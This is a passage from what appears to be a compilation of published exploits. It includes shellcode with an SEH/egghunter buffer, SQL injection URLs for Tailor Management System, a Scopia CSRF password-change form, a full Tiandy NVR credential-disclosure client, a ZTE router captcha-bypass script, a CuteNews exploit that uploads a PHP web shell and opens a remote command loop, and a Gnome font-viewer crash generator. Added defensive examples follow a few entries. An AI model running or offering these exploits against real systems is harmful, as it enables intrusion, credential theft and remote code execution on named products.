buf += b"\x76\x44\x33\x6b\x63\x6b\x43\x51\x72\x79\x72\x7a\x63"
buf += b"\x61\x6b\x4f\x49\x70\x61\x4f\x63\x6f\x61\x4a\x4c\x4b"
buf += b"\x62\x32\x4a\x4b\x4e\x6d\x73\x6d\x61\x7a\x57\x71\x6c"
buf += b"\x4d\x4f\x75\x4c\x72\x47\x70\x65\x50\x35\x50\x56\x30"
buf += b"\x63\x58\x50\x31\x6e\x6b\x32\x4f\x4c\x47\x49\x6f\x79"
buf += b"\x45\x6d\x6b\x6d\x30\x47\x6d\x76\x4a\x65\x5a\x33\x58"
buf += b"\x49\x36\x7a\x35\x6d\x6d\x4d\x4d\x49\x6f\x4e\x35\x37"
buf += b"\x4c\x37\x76\x51\x6c\x35\x5a\x6f\x70\x6b\x4b\x4b\x50"
buf += b"\x63\x45\x54\x45\x6f\x4b\x53\x77\x54\x53\x71\x62\x70"
buf += b"\x6f\x50\x6a\x35\x50\x46\x33\x79\x6f\x68\x55\x31\x73"
buf += b"\x53\x51\x70\x6c\x43\x53\x56\x4e\x62\x45\x73\x48\x71"
buf += b"\x75\x67\x70\x41\x41"

# Egghunter: scans memory for the "w00t" tag (\x77\x30\x30\x74) and jumps to the payload behind it
egg = b""
egg += b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egg += b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

# SEH overwrite: next-SEH pointer and handler address (pop/pop/ret)
nseh = struct.pack("<I", 0x06710870)
seh = struct.pack("<I", 0x10023B71)

buffer = b"A" * 456 + nseh + seh + b"A" * 5 + egg + b"\xff" * 200

# Both files are written in binary mode so the raw bytes reach disk unchanged
f = open("poc.txt", "wb")
f.write(buffer)
f.close()

f = open("buf.txt", "wb")
f.write(buf)
f.close()
16.
# Exploit Title: Tailor Management System - 'id' SQL Injection
# Google Dork: N/A
# Date: 2020-09-08
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
# Version: v1.0
# Tested on: Kali linux
# CVE: N/A

http://localhost/tailor/addmeasurement.php?id=-1'+union+select+concat(username,0x3a,password),2+from+users-- -

http://localhost/tailor/staffedit.php?id=-1'+union+select+1,2,3,concat(username,0x3a,password),5+from+users-- -

http://localhost/tailor/staffcatedit.php?id=-3'+union+select+concat(username,0x3a,password)+from+users-- -
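What makes the `id` parameter above injectable, and what closes it, in runnable form. This is an added example and not the Tailor Management System's PHP: an in-memory SQLite database with constructed tables stands in for the application's MySQL schema, and the advisory's first payload is adapted to SQLite syntax (`||` in place of `CONCAT()`, which older SQLite releases lack). The vulnerable function splices the request value into the query text, the pattern the URLs above rely on; the fixed one binds it as a parameter.

```python
"""Union-based SQL injection next to its parameterized fix (added example)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema: a measurements table (what the page should read)
    and a users table (what the union payload pulls in)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE measurements (id INTEGER PRIMARY KEY, label TEXT, value TEXT);
        INSERT INTO measurements VALUES (1, 'chest', '38');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'not-a-real-hash');
        """
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, id_param: str):
    """String-built query: the quote in the payload closes the literal and the
    remainder is parsed as SQL, so a UNION can append rows from any table."""
    sql = f"SELECT label, value FROM measurements WHERE id = '{id_param}'"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn: sqlite3.Connection, id_param: str):
    """Bound parameter: the value travels separately from the statement text
    and can never alter its structure, whatever characters it contains."""
    sql = "SELECT label, value FROM measurements WHERE id = ?"
    return conn.execute(sql, (id_param,)).fetchall()


# The advisory's first URL value, rewritten for SQLite (constructed)
PAYLOAD = "-1' union select username || ':' || password, 2 from users-- -"


def demo():
    """Returns (rows leaked by the vulnerable query, rows from the fixed query
    given the same payload, rows from the fixed query given a normal id)."""
    conn = make_db()
    leaked = lookup_vulnerable(conn, PAYLOAD)
    safe = lookup_fixed(conn, PAYLOAD)
    normal = lookup_fixed(conn, "1")
    return leaked, safe, normal


if __name__ == "__main__":
    leaked, safe, normal = demo()
    print("vulnerable query with payload:", leaked)
    print("fixed query with payload:     ", safe)
    print("fixed query with id=1:        ", normal)
```

The first line of output is the `username:password` pair that the advisory's `concat(username,0x3a,password)` column produces against MySQL; the second is empty because the whole payload is compared as one opaque value against `id`. In PHP the equivalent fix is `mysqli_prepare()`/`bind_param()` or PDO with bound parameters on every page that reads `$_GET['id']`, plus an integer cast where the id is numeric.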
17.
# Exploit Title: Scopia XT Desktop 8.3.915.4 - Cross-Site Request Forgery (change admin password)
# Google Dork: inurl:scopia+index.jsp
# Date: 2020-09-09
# Exploit Author: v1n1v131r4
# Vendor Homepage: https://avaya.com
# Software Link: https://support.avaya.com/downloads/download-details.action?contentId=C201772012204170_4&productId=P1605
# Version: 8.3.915.4
# Tested on: Windows 10 Pro
# CVE : N/A
# PoC: https://github.com/V1n1v131r4/Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4

# CSRF to change admin password
# The admin password will be changed to "attacker"

<!DOCTYPE html>
<html>
  <body>
    <form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
      <input type="text" name="JSESSIONID" value="">
      <input type="text" name="newadminusername" value="">
      <input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
      <input type="text" name="newenablext1000meetingpin" value="false">
      <input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
      <input type="text" name="checkstatus" value="true">
      <input type="submit" value="Send">
    </form>
  </body>
</html>
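Server-side defence for the kind of state-changing form the PoC above targets, as an added example rather than Scopia's code: a CSRF token HMAC-bound to the session, so a form served from another origin cannot carry a valid one, combined with an Origin-header check as an independent second signal. `SITE_ORIGIN`, `SERVER_SECRET` and the `csrf_token` field name are assumptions of this example.

```python
"""Session-bound CSRF tokens plus an Origin check (added example)."""
import hashlib
import hmac
import secrets
from typing import Mapping, Optional

SERVER_SECRET = secrets.token_bytes(32)   # per-deployment key (constructed here)
SITE_ORIGIN = "https://scopia.example"    # hypothetical origin of the admin UI


def issue_token(session_id: str) -> str:
    """Token = nonce.HMAC(secret, session_id:nonce). Embedded as a hidden form
    field when the page is rendered; the nonce makes each token distinct."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def token_is_valid(session_id: str, token: Optional[str]) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac.encode(), expected.encode())


def request_allowed(session_id: str, headers: Mapping[str, str], form: Mapping[str, str]) -> bool:
    """Accept a POST only if the token matches the session AND, when the
    browser sent an Origin header, it names this site. Header names are
    assumed to be canonicalised ("Origin") by the framework before this call."""
    origin = headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return False
    return token_is_valid(session_id, form.get("csrf_token"))


if __name__ == "__main__":
    sid = "session-of-logged-in-admin"          # constructed session id
    tok = issue_token(sid)
    # Legitimate submission from the admin UI
    print(request_allowed(sid, {"Origin": SITE_ORIGIN},
                          {"csrf_token": tok, "newadminpassword": "x"}))
    # The PoC form above: foreign origin, no token (the browser adds only the cookie)
    print(request_allowed(sid, {"Origin": "https://attacker.example"},
                          {"newadminpassword": "3B09A36C1C32CF30EB8169F43227957C"}))
```

The PoC form carries an empty `JSESSIONID` field because it does not need one: the browser attaches the victim's session cookie automatically. A CSRF token is exactly the credential the browser will not attach on its own, which is why it has to live in the form body (or a custom header) and be checked against the session. Binding it with an HMAC over the session id means a token harvested from one session is useless in another, and the Origin check rejects the cross-site POST even if a token ever leaked.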
18.
# Exploit Title: Tiandy IPC and NVR 9.12.7 - Credential Disclosure
# Date: 2020-09-10
# Exploit Author: zb3
# Vendor Homepage: http://en.tiandy.com
# Product Link: http://en.tiandy.com/index.php?s=/home/product/index/category/products.html
# Software Link: http://en.tiandy.com/index.php?s=/home/article/lists/category/188.html
# Version: DVRS_V9.12.7, DVRS_V11.7.4, NVSS_V13.6.1, NVSS_V22.1.0
# Tested on: Linux
# CVE: N/A

# Requires Python 3 and PyCrypto
# For more details and information on how to escalate this further, see:
# https://github.com/zb3/tiandy-research

import sys
import hashlib
import base64
import socket
import struct
from Crypto.Cipher import DES


def main():
    if len(sys.argv) != 2:
        print('python3 %s [host]' % sys.argv[0], file=sys.stderr)
        exit(1)

    host = sys.argv[1]

    conn = Channel(host)
    conn.connect()

    crypt_key = conn.get_crypt_key(65536)

    attempts = 2
    tried_to_set_mail = False
    ok = False

    while attempts > 0:
        attempts -= 1

        code = get_psw_code(conn)
        if code is False:
            # psw not supported
            break
        elif code is None:
            if not tried_to_set_mail:
                print("No PSW data found, we'll try to set it...", file=sys.stderr)
                tried_to_set_mail = True
                if try_set_mail(conn, '[email protected]'):
                    code = get_psw_code(conn)

            if code is None:
                print("couldn't set mail", file=sys.stderr)
                break

        rcode, password = recover_with_code(conn, code, crypt_key)
        if rcode == 5:
            print('The device is locked, try again later.', file=sys.stderr)
            break

        if rcode == 0:
            print('Admin', password)
            ok = True
            break

    if tried_to_set_mail:
        try_set_mail(conn, '')

    if not code:
        print("PSW is not supported, trying default credentials...", file=sys.stderr)
        credentials = recover_with_default(conn, crypt_key)
        if credentials:
            user, pw = credentials
            print(user, pw)
            ok = True

    if not ok:
        print('Recovery failed', file=sys.stderr)
        exit(1)


def try_set_mail(conn, target):
    conn.send_msg(['PROXY', 'USER', 'RESERVEPHONE', '2', '1', target, 'FILETRANSPORT'])
    resp = conn.recv_msg()
    return resp[4:7] == ['RESERVEPHONE', '2', '1']


def get_psw_code(conn):
    conn.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(b'Admin').decode(), base64.b64encode(b'Admin').decode(), '', '65536', 'UTF-8', '0', '1'])
    resp = conn.recv_msg()
    if resp[4] != 'FINDPSW':
        return False

    psw_reg = psw_data = None
    if len(resp) > 7:
        psw_reg = resp[6]
        psw_data = resp[7]

    if not psw_data:
        return None

    psw_type = int(resp[5])
    if psw_type not in (1, 2, 3):
        raise Exception('unsupported psw type: ' + str(psw_type))

    if psw_type == 3:
        psw_data = psw_data.split('"')[3]

    if psw_type == 1:
        psw_data = psw_data.split(':')[1]
        psw_key = psw_reg[:0x1f]
    elif psw_type in (2, 3):
        psw_key = psw_reg[:4].lower()

    psw_code = td_decrypt(psw_data.encode(), psw_key.encode())
    code = hashlib.md5(psw_code).hexdigest()[24:]
    return code


def recover_with_code(conn, code, crypt_key):
    conn.send_msg(['IP', 'USER', 'SECURITYCODE', code, 'FILETRANSPORT'])
    resp = conn.recv_msg()
    rcode = int(resp[6])
    if rcode == 0:
        return rcode, decode(resp[8].encode(), crypt_key).decode()
    return rcode, None


def recover_with_default(conn, crypt_key):
    res = conn.login_with_key(b'Default', b'Default', crypt_key)
    if not res:
        return False

    while True:
        msg = conn.recv_msg()
        if msg[1:5] == ['IP', 'INNER', 'SUPER', 'GETUSERINFO']:
            return decode(msg[6].encode(), crypt_key).decode(), decode(msg[7].encode(), crypt_key).decode()


###
### lib/des.py
###

def reverse_bits(data):
    return bytes([(b * 0x0202020202 & 0x010884422010) % 0x3ff for b in data])


def pad(data):
    if len(data) % 8:
        padlen = 8 - (len(data) % 8)
        data = data + b'\x00' * (padlen - 1) + bytes([padlen])
    return data


def unpad(data):
    padlen = data[-1]
    if 0 < padlen <= 8 and data[-padlen:-1] == b'\x00' * (padlen - 1):
        data = data[:-padlen]
    return data


def encrypt(data, key):
    cipher = DES.new(reverse_bits(key), 1)
    return reverse_bits(cipher.encrypt(reverse_bits(pad(data))))


def decrypt(data, key):
    cipher = DES.new(reverse_bits(key), 1)
    return unpad(reverse_bits(cipher.decrypt(reverse_bits(data))))


def encode(data, key):
    return base64.b64encode(encrypt(data, key))


def decode(data, key):
    return decrypt(base64.b64decode(data), key)


###
### lib/binproto.py
###

def recvall(s, l):
    buf = b''
    while len(buf) < l:
        nbuf = s.recv(l - len(buf))
        if not nbuf:
            break
        buf += nbuf
    return buf


class Channel:
    def __init__(self, ip, port=3001):
        self.ip = ip
        self.ip_bytes = socket.inet_aton(ip)[::-1]
        self.port = port
        self.msg_seq = 0
        self.data_seq = 0
        self.msg_queue = []

    def fileno(self):
        return self.socket.fileno()

    def connect(self):
        self.socket = socket.socket()
        self.socket.connect((self.ip, self.port))

    def reconnect(self):
        self.socket.close()
        self.connect()

    def send_cmd(self, data):
        self.socket.sendall(b'\xf1\xf5\xea\xf5' + struct.pack('<HH8xI', self.msg_seq, len(data) + 20, len(data)) + data)
        self.msg_seq += 1

    def send_data(self, stream_type, data):
        self.socket.sendall(struct.pack('<4sI4sHHI', b'\xf1\xf5\xea\xf9', self.data_seq, self.ip_bytes, 0, len(data) + 20, stream_type) + data)
        self.data_seq += 1

    def recv(self):
        hdr = recvall(self.socket, 20)
        if hdr[:4] == b'\xf1\xf5\xea\xf9':
            lsize, stream_type = struct.unpack('<14xHI', hdr)
            data = recvall(self.socket, lsize - 20)
            if data[:4] != b'NVS\x00':
                print(data[:4], b'NVS\x00')
                raise Exception('invalid data header')
            return None, [stream_type, data[8:]]
        elif hdr[:4] == b'\xf1\xf5\xea\xf5':
            lsize, dsize = struct.unpack('<6xH10xH', hdr)
            if lsize != dsize + 20:
                raise Exception('size mismatch')
            msgs = []
            for msg in recvall(self.socket, dsize).decode().strip().split('\n\n\n'):
                msg = msg.split('\t')
                if '.' not in msg[0]:
                    msg = [self.ip] + msg
                msgs.append(msg)
            return msgs, None
        else:
            raise Exception('invalid packet magic: ' + hdr[:4].hex())

    def recv_msg(self):
        if len(self.msg_queue):
            ret = self.msg_queue[0]
            self.msg_queue = self.msg_queue[1:]
            return ret

        msgs, _ = self.recv()
        if len(msgs) > 1:
            self.msg_queue.extend(msgs[1:])
        return msgs[0]

    def send_msg(self, msg):
        self.send_cmd((self.ip + '\t' + '\t'.join(msg) + '\n\n\n').encode())

    def get_crypt_key(self, mode=1, uname=b'Admin', pw=b'Admin'):
        self.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(uname).decode(), base64.b64encode(pw).decode(), '', str(mode), 'UTF-8', '805306367', '1'])
        resp = self.recv_msg()
        if resp[4:6] != ['LOGONFAILED', '3']:
            print(resp)
            raise Exception('unrecognized login response')
        crypt_key = base64.b64decode(resp[8])
        return crypt_key

    def login_with_key(self, uname, pw, crypt_key):
        self.reconnect()
        hashed_uname = base64.b64encode(hashlib.md5(uname.lower() + crypt_key).digest())
        hashed_pw = base64.b64encode(hashlib.md5(pw + crypt_key).digest())
        self.send_msg(['IP', 'USER', 'LOGON', hashed_uname.decode(), hashed_pw.decode(), '', '1', 'UTF-8', '1', '1'])
        resp = self.recv_msg()
        if resp[4] == 'LOGONFAILED':
            return False
        self.msg_queue = [resp] + self.msg_queue
        return True

    def login(self, uname, pw):
        crypt_key = self.get_crypt_key(1, uname, pw)
        if not self.login_with_key(uname, pw, crypt_key):
            return False
        return crypt_key


###
### lib/crypt.py
###

pat = b'abcdefghijklmnopqrstuvwxyz0123456789'


def td_asctonum(code):
    if code in b'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
        code += 0x20
    if code not in pat:
        return None
    return pat.index(code)


def td_numtoasc(code):
    if code < 36:
        return pat[code]
    return None


gword = [
    b'SjiW8JO7mH65awR3B4kTZeU90N1szIMrF2PC',
    b'04A1EF7rCH3fYl9UngKRcObJD6ve8W5jdTta',
    b'brU5XqY02ZcA3ygE6lf74BIG9LF8PzOHmTaC',
    b'2I1vF5NMYd0L68aQrp7gTwc4RP9kniJyfuCH',
    b'136HjBIPWzXCY9VMQa7JRiT4kKv2FGS5s8Lt',
    b'Hwrhs0Y1Ic3Eq25a6t8Z7TQXVMgdePuxCNzJ',
    b'WAmkt3RCZM829P4g1hanBluw6eVGSf7E05oX',
    b'dMxreKZ35tRQg8E02UNTaoI76wGSvVh9Wmc1',
    b'i20mzKraY74A6qR9QM8H3ecUkBlpJC1nyFSZ',
    b'XCAUP6H37toQWSgsNanf0j21VKu9T4EqyGd5',
    b'dFZPb9B6z1TavMUmXQHk7x402oEhKJD58pyG',
    b'rg8V3snTAX6xjuoCYf519BzWRtcMl2OiZNeI',
    b'dZe620lr8JW4iFhNj3K1x59Una7PXsLGvSmB',
    b'5yaQlGSArNzek6MXZ1BPOE3xV470h9KvgYmb',
    b'f12CVxeQ56YWd7OTXDtlnPqugjJikELayvMs',
    b'9Qoa5XkM6iIrR7u8tNZgSpbdDUWvwH21Kyzh',
    b'AqGWke65Y2ufVgljEhMHJL01D8Zptvcw7CxX',
    b't960P2inR8qEVmAUsDZIpH5wzSXJ43ob1kGW',
    b'4l6SAi2KhveRHVN5JGcmx9jOC3afB7wF0ITq',
    b'tEOp6Xo87QzPbn24J3i9FjWKS1lIBVaMZeHU',
    b'zx27DH915lhs04aMJOgf6Z3pyERrGndiLwIe',
    b'8XxOBzZ02hUWDQfvL471q9RC6sAaJVFuTMdG',
    b'jON0i4C6Z3K97DkbqSypH8lRmx5o2eIwXas1',
    b'OIGT0ubwH1x6hCvEgBn274A5Q8K9e3YyzWlm',
    b'zgejY41CLwRNabovBUP2Aql7FVM8uEDXZQ0c',
    b'Z2MpQE91gdRLYJ8bGIWyOfc4v03Hjzs6VlU5',
    b't6PuvrBXeoHk5FJW08DYQSI49GCwZ27cA1UK',
    b'FiBA53IMW97kYNz82GhHf1yUCdL0nlvRD46s',
    b'2Vz3b06h54jmc7a8AIYtNHM1iQU9wBXWyJkR',
    b'wyI42azocV3UOX6fk579hMH8eEGJsgFuBmqb',
    b'TxmnK4ljJ9iroY8vVtg3Rae2L516fBWUuXAS',
    b'z6Y1bPrJEln0uWeLKkjo9IZ2y7ROcFHqBm54',
    b'x064LFB39TsXeryqvt2pZN8QIERuWAVUmwjJ',
    b'76qg85yB31uH90YbZofsjKrR GiTVndAEtFMx'.replace(b' ', b''),
    b'WjwTEbCA752kq89shcaLB1xO64rgMYnoFiJQ',
    b'u6307O4J2DeZs8UYyjlzfX91KGmavEdwTRSg'
]


def td_decrypt(data, key):
    kdx = 0
    ret = []
    for idx, code in enumerate(data):
        while True:
            if kdx >= len(key):
                kdx = 0
            kcode = key[kdx]
            knum = td_asctonum(kcode)
            if knum is None:
                kdx += 1
                continue
            break

        if code not in gword[knum]:
            return None
        cpos = gword[knum].index(code)
        ret.append(td_numtoasc(cpos))
        kdx += 1
    return bytes(ret)


if __name__ == '__main__':
    main()
19.
# Exploit Title: ZTE Router F602W - Captcha Bypass
# Exploit Author: Hritik Vijay (@MrHritik)
# Vendor Homepage: https://zte.com.cn
# Reported: 2019-06-14
# Version: F6x2W V6.0.10P2T2
# Version: F6x2W V6.0.10P2T5
# Tested on: F602W
# CVE: CVE-2020-6862

Background
-----------
Captcha is used to make sure the form is being filled by a real person rather than an automated script. This is a very popular safety measure and bypassing it could lead to potential compromise.

Introduction
------------
While logging in to the affected device you are presented with a username, password and captcha field. Submitting the form results in an HTTP request being sent out to /checkValidateCode.gch to validate the captcha; if valid, it goes on to really submit the login request. This can be easily bypassed as this is a client-side verification. One can always ignore the response and proceed to forcefully submit the form via Javascript (via calling the subpageSubmit() method).

A typical login request looks like this:

POST / HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Connection: close
Cookie: _TESTCOOKIESUPPORT=1
Upgrade-Insecure-Requests: 1

frashnum=&action=login&Frm_Logintoken=2&Username=admin&Password=admin&Validatecode=literally_anything

Though, firing the same request twice fails with a text on the top saying "Error". This pretty much defeats our purpose. It turns out that on every login attempt, the parameter Frm_Logintoken gets incremented by one and is required to match the server-side value. This can pretty easily be achieved by some pattern matching, thus allowing any script to bypass the captcha and log in.

Threat
-------
A captcha bypass can really help in bruteforcing the credentials, but luckily the router limits the login trials to 3 attempts. In the real world, though, things are a bit different. The affected ZTE router comes with a default password. Given that the devices on the same ISP network can access each other, it would be a matter of time before someone writes a script to log in to every router in the network and take control of it.

PoC
-------
#!/bin/bash
SERVER=192.168.1.1
USER="admin"
PASS="admin"

# Scrape the current Frm_Logintoken value from the login page
getToken(){
    curl -s --cookie ' _TESTCOOKIESUPPORT=1; PATH=/;' $SERVER | grep 'Frm_Logintoken")' | cut -d\" -f4
}

Frm_Logintoken=`getToken`

s=$(curl -sv --data "frashnum=&action=login&Frm_Logintoken=$Frm_Logintoken&Username=$USER&Password=$PASS" --cookie ' _TESTCOOKIESUPPORT=1; PATH=/;' $SERVER -w "%{http_code}" -o /dev/null 2> /tmp/zte_cookie)

if [[ $s -eq 302 ]]; then
    echo "Logged in"
    echo "Open http://$SERVER/start.ghtml"
    echo `grep -o Set-Cookie.* /tmp/zte_cookie`
else
    echo "Failed"
fi
20. # Exploit Title: CuteNews 2.1.2 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-10
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://cutephp.com/cutenews/downloading.php
# Software Link: https://cutephp.com/cutenews/downloading.php
# Version: CuteNews 2.1.2
# Tested on: Ubuntu 20.04, CuteNews 2.1.2
# CVE : CVE-2019-11447

#! /bin/env python3

import requests
from base64 import b64decode
import io
import re
import string
import random
import sys

banner = """
 _____ __ _ __ ___ ___ ___ / ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ | / /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/ \___/\_,_/\__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/ ___ _________ / _ \/ ___/ __/ / , _/ /__/ _/ /_/|_|\___/___/
"""

print (banner)
print ("[->] Usage python3 exploit.py")
print ()

sess = requests.session()
payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>"
ip = input("Enter the URL> ")

def extract_credentials():
    global sess, ip
    url = f"{ip}/CuteNews/cdata/users/lines"
    encoded_creds = sess.get(url).text
    buff = io.StringIO(encoded_creds)
    chash = buff.readlines()
    if "Not Found" in encoded_creds:
        print ("[-] No hashes were found skipping!!!")
        return
    else:
        for line in chash:
            if "<?php die('Direct call - access denied'); ?>" not in line:
                credentials = b64decode(line)
                try:
                    sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)
                    print (sha_hash)
                except:
                    pass

def register():
    global sess, ip
    userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10))
    postdata = {
        "action" : "register",
        "regusername" : userpass,
        "regnickname" : userpass,
        "regpassword" : userpass,
        "confirm" : userpass,
        "regemail" : f"{userpass}@hack.me"
    }
    register = sess.post(f"{ip}/CuteNews/index.php?register", data = postdata, allow_redirects = False)
    if 302 == register.status_code:
        print (f"[+] Registration successful with username: {userpass} and password: {userpass}")
    else:
        sys.exit()

def send_payload(payload):
    global ip
    token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text
    signature_key = re.search('signature_key" value="(.*?)"', token).group(1)
    signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1)
    logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)
    print (f"signature_key: {signature_key}")
    print (f"signature_dsi: {signature_dsi}")
    print (f"logged in user: {logged_user}")
    files = {
        "mod" : (None, "main"),
        "opt" : (None, "personal"),
        "__signature_key" : (None, f"{signature_key}"),
        "__signature_dsi" : (None, f"{signature_dsi}"),
        "editpassword" : (None, ""),
        "confirmpassword" : (None, ""),
        "editnickname" : (None, logged_user),
        "avatar_file" : (f"{logged_user}.php", payload),
        "more[site]" : (None, ""),
        "more[about]" : (None, "")
    }
    payload_send = sess.post(f"{ip}/CuteNews/index.php", files = files).text
    print("============================\nDropping to a SHELL\n============================")
    while True:
        print ()
        command = input("command > ")
        postdata = {"cmd" : command}
        output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)
        if 404 == output.status_code:
            print ("sorry i can't find your webshell try running the exploit again")
            sys.exit()
        else:
            output = re.sub("GIF8;", "", output.text)
            print (output.strip())

if __name__ == "__main__":
    print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================")
    extract_credentials()
    print ("================================================================")
    print()
    print ("=============================\nRegistering a user\n=============================")
    register()
    print()
    print("=======================================================\nSending Payload\n=======================================================")
    send_payload(payload)
    print ()
21. #!/usr/bin/env python3
# Exploit Title: Gnome Fonts Viewer 3.34.0 Heap Corruption
# Date: 2020-09-10
# Exploit Author: Cody Winkler
# Vendor Homepage: gnome.org
# Software Link: https://help.gnome.org/misc/release-notes/3.6/users-font-viewer.html
# Version: 3.34.0
# Tested On: Ubuntu 20.04.1 LTS
#
# Note: May take a few tries. Too many consecutive runs can freeze OS.
# This will trigger an infinite malloc() loop until gnome-font-viewer process is stopped.

from os import system

this_pattern = "BEEF"*21125 # needs to be filled to len ~84500

# TTF file header (probably has some junk data in it) taken from MesloLGS NF Regular.ttf
ttf_header = ("\x00\x01\x00\x00\x00\x13\x01\x00\x00\x04\x00\x30\x46\x46\x54"
              "\x4d\x75\xfe\x73\xdd\x00\x13\xb6\x0c\x00\x00\x00\x1c\x47\x44\x45"
              "\x46\x4d\x76\x5d\xda\x00\x13\xb0\xac\x00\x00\x04\xaa\x47\x50\x4f"
              "\x53\x44\x76\x4c\x75\x00\x13\xb5\xec\x00\x00\x00\x20\x47\x53\x55"
              "\x42\x09\xf6\x0b\xdc\x00\x13\xb5\x58\x00\x00\x00\x92\x4f\x53\x2f"
              "\x32\x8d\xbd\x8e\x75\x00\x00\x01\xb8\x00\x00\x00\x60\x50\x66\x45"
              "\x64\x5b\xd3\xe9\x6b\x00\x13\xb6\x28\x00\x00\x02\x50\x63\x6d\x61"
              "\x70\xbf\x0d\x76\x7c\x00\x00\x34\x30\x00\x00\x0a\x36\x63\x76\x74"
              "\x20\x28\xfd\x02\x16\x00\x00\x48\x98\x00\x00\x00\x38\x66\x70\x67"
              "\x6d\x31\xfc\xa0\x95\x00\x00\x3e\x68\x00\x00\x09\x96\x67\x61\x73"
              "\x70\xff\xff\x00\x10\x00\x13\xb0\xa4\x00\x00\x00\x08\x67\x6c\x79"
              "\x66\xd6\x2f\x24\x7c\x00\x00\xac\xf0\x00\x11\xd8\x34\x68\x65\x61"
              "\x64\x04\xe3\x81\x66\x00\x00\x01\x3c\x00\x00\x00\x36\x68\x68\x65"
              "\x61\x0a\xf4\x01\xa2\x00\x00\x01\x74\x00\x00\x00\x24\x68\x6d\x74"
              "\x78\x93\xdf\x7e\x92\x00\x00\x02\x18\x00\x00\x32\x16\x6c\x6f\x63"
              "\x61\xe6\x44\x45\x24\x00\x00\x48\xd0\x00\x00\x64\x20\x6d\x61\x78"
              "\x70\x1a\xa2\x0b\x9c\x00\x00\x01\x98\x00\x00\x00\x20\x6e\x61\x6d"
              "\x65\x62\x13\x17\xa4\x00\x12\x85\x24\x00\x00\x0b\x9d\x70\x6f\x73"
              "\x74\xbb\xe8\x29\xcf\x00\x12\x90\xc4\x00\x01\x1f\xdd\x70\x72\x65"
              "\x70\xb4\xc5\xc5\x72\x00\x00\x48\x00\x00\x00\x00\x95\x00\x01\x00"
              "\x00\x00\x02\x07\x2b\xd0\x81\xfc\x0f\x5f\x0f\x3c\xf5\x02\x9f\x08"
              "\x00\x00\x00\x00\x00\xc5\x74\x19\x33\x00\x00\x00\x00\xda\x9d\x14"
              "\xf1\xfd\x41\xfc\xfc\x05\xdf\x0a")

print('[+] Generating crash.ttf with DEADDEAD')
# Written in binary mode so the \x80-\xff header bytes land in the file as-is
# instead of being UTF-8 encoded by a text-mode write.
with open("./crash.ttf", 'wb') as f:
    f.write(ttf_header.encode("latin-1"))
    f.write(this_pattern.encode("ascii"))
print('[+] Done')

print('[+] Triggering out-of-bounds write in gnome-font-viewer')
system("/usr/bin/gnome-font-viewer ./crash.ttf")
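A pre-parse sanity check a font-handling service could run on untrusted fonts, added here and not taken from the advisory or from GNOME's code: it walks the sfnt table directory and reports any table whose offset/length lie outside the file, which is the shape of crash.ttf above (table records claiming offsets above 1 MB in a file of roughly 85 KB). check_sfnt and build_sample are assumed names and the sample bytes are constructed.

```python
import struct

# sfntVersion, numTables, searchRange, entrySelector, rangeShift (big endian)
OFFSET_TABLE = struct.Struct(">IHHHH")
# tag, checkSum, offset, length
TABLE_RECORD = struct.Struct(">4sIII")
KNOWN_VERSIONS = {0x00010000, 0x4F54544F, 0x74727565}  # 1.0, 'OTTO', 'true'


def check_sfnt(data):
    """Return a list of findings for a TrueType/OpenType blob. An empty list
    means the directory is self consistent and every table lies inside the file."""
    findings, size = [], len(data)
    if size < OFFSET_TABLE.size:
        return ["file shorter than the 12-byte offset table"]
    version, num_tables, search_range, entry_selector, range_shift = OFFSET_TABLE.unpack_from(data, 0)
    if version not in KNOWN_VERSIONS:
        findings.append(f"unknown sfnt version 0x{version:08x}")
    dir_end = OFFSET_TABLE.size + num_tables * TABLE_RECORD.size
    if dir_end > size:
        findings.append(f"numTables={num_tables} needs {dir_end} bytes of directory, file has {size}")
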